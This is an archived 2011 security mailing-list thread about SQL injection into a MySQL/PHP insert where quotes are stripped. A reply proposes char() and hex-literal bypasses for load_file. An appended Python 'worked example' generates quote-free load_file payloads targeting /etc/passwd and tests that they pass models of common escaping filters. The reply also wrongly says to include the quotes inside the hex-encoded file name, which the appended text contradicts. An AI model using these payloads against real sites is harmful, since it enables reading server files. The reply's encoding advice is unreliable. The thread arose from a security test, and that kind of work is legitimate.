WebApp Sec mailing list archives

Re: SQLi with backslash


From: Voulnet <voulnet () gmail com>
Date: Fri, 24 Jun 2011 20:17:33 +0300

They are probably using the mysql_real_escape_string PHP function,
which escapes these characters. There are many ways to bypass it, and
you can find them all over the web.

Some examples:

use char(39) <-- ASCII decimal value of ' is 39
or use the hex value. For example SELECT (0x27) <-- 27 is the hex value of '.

For example, if you want to load a file, you would call
load_file('myfile'). Using hex encoding, you take 'myfile' with the
single quotes included and convert it to hex, then write it as
load_file(0x27..........27) with the rest of the hex values of the
filename characters filled in between.



On Wed, Jun 22, 2011 at 5:03 PM, Robin Wood <robin () digininja org> wrote:
Hi
I've got a scenario where both single and double quotes are being
stripped but no other escaping appears to be performed. The
database is MySQL with PHP on top.

The query that I've found SQL injection on is in the form

insert into log values ('a', 'b');

where I can inject in to the second parameter.

If I inject a backslash then I get

insert into log values ('a', 'b\');

which gives an invalid SQL statement and is how the injection was
found. Can anyone come up with a way to exploit this? If I put
anything before the slash it isn't really worth anything, and if I put
anything after then the statement becomes valid and the slash escapes
whatever character is after it.

I thought about using the slash to encode something but couldn't get it to work.

The table is write-only for me. I can't see any of its entries echoed
back to the site anywhere, so I can't go for stored XSS or anything
like that (maybe possible but not in the time available for the test).

Apart from breaking the statement I can't see a way to exploit this,
can anyone else?

Robin



This list is sponsored by Cenzic
--------------------------------------
Let Us Hack You. Before Hackers Do!
It's Finally Here - The Cenzic Website HealthCheck. FREE.
Request Yours Now!
http://www.cenzic.com/2009HClaunch_Securityfocus
--------------------------------------





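Worked example (added here; it is not code from either message in the thread): a Python helper that builds the quote-free char()/0x.. literals described in the reply above and checks them against models of the two server-side filters the thread mentions, quote stripping and mysql_real_escape_string. The filter models, the sample path /etc/passwd and the function names are assumptions made for illustration. One detail worth checking in practice: a 0x.. literal stands in for the whole quoted string, so only the file name's own bytes are encoded, and decoding the literal back should give exactly the path you intended.

```python
# Added example (not part of the original thread): quote-free MySQL string
# literals for injection into quote-stripped or backslash-escaped inputs,
# checked against constructed models of the two filters discussed above.
# Filter models, sample path and function names are assumptions.

from typing import Callable


def strip_quotes(s: str) -> str:
    """Model of the filter from the original question: ' and " removed, nothing else."""
    return s.replace("'", "").replace('"', "")


def mysql_real_escape_string(s: str) -> str:
    """Model of PHP's mysql_real_escape_string(): NUL, newline, carriage return,
    backslash, both quotes and Ctrl-Z get a leading backslash."""
    table = {
        "\0": "\\0",
        "\n": "\\n",
        "\r": "\\r",
        "\\": "\\\\",
        "'": "\\'",
        '"': '\\"',
        "\x1a": "\\Z",
    }
    return "".join(table.get(c, c) for c in s)


def hex_literal(s: str) -> str:
    """MySQL hexadecimal literal (0x...). In string context MySQL treats it as
    the string whose bytes are the encoded hex, so no quotes are needed."""
    return "0x" + s.encode("utf-8").hex()


def char_literal(s: str) -> str:
    """Same string built with CHAR(): char(39) for a single quote, etc."""
    return "char(" + ",".join(str(b) for b in s.encode("utf-8")) + ")"


def decode_hex_literal(lit: str) -> str:
    """Reverse of hex_literal(); confirms the literal encodes the intended text."""
    if not lit.startswith("0x"):
        raise ValueError("not a MySQL hex literal")
    return bytes.fromhex(lit[2:]).decode("utf-8")


def load_file_query(path: str, form: str = "hex") -> str:
    """select load_file(<quote-free literal>) for the given path. The literal
    replaces the whole quoted string, so the quote characters themselves are
    not part of the bytes that get encoded."""
    enc = hex_literal if form == "hex" else char_literal
    return f"select load_file({enc(path)})"


def survives(filt: Callable[[str], str], payload: str) -> bool:
    """True when the filter leaves the payload byte-for-byte unchanged."""
    return filt(payload) == payload


if __name__ == "__main__":
    quoted = "select load_file('/etc/passwd')"  # constructed sample query
    for form in ("hex", "char"):
        q = load_file_query("/etc/passwd", form)
        print(q, "| strip:", survives(strip_quotes, q),
              "| escape:", survives(mysql_real_escape_string, q))
    print(quoted, "| strip:", survives(strip_quotes, quoted),
          "| escape:", survives(mysql_real_escape_string, quoted))
    print(strip_quotes(quoted))  # load_file(/etc/passwd): quotes gone, SQL broken
    print(decode_hex_literal(hex_literal("/etc/passwd")))
```

Both the hex and the char() forms pass both filter models untouched, while the plainly quoted form is mangled by either one. Run the decode check before sending a payload; a literal that decodes to something other than the intended path is the usual sign that the quotes were wrongly included in the encoded bytes.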

